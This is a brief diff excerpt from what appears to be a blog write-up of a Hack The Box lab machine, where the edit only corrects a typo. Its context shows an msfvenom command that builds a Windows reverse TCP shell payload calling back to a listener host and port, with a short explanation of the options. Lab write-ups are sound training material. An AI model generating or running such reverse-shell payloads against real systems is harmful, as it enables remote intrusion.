nullprism/nullprism.github.io/_posts/2021-08-03-htb-legacy.md

 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.142 LPORT=4443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -a x86 --platform windows
 ```

-Thankfully the POC is well documentated for what it wants for shellcode, but to break this down a bit:
+Thankfully the POC is well documented for what it wants for shellcode, but to break this down a bit:
 - Windows Reverse TCP shell payload
 - Call back to me on port 4443 (I try to pick ports over 1000 whenever possible)
 - If the shell exits, keep the program running (hence the thread)